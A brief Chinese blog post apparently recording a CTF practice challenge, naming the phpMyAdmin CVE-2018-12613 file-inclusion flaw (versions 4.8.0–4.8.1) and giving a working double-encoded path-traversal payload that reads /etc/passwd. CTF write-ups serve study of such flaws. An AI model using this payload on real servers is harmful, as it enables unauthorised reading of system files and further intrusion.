刷题记录:[GWCTF 2019]我有一个数据库

刷题记录:[GWCTF 2019]我有一个数据库

题目复现链接:https://buuoj.cn/challenges

知识点

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞

cve-2018-12613-PhpMyadmin后台文件包含
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd

posted @ 2020-01-15 01:45  MustaphaMond  阅读(1874)  评论(0编辑  收藏  举报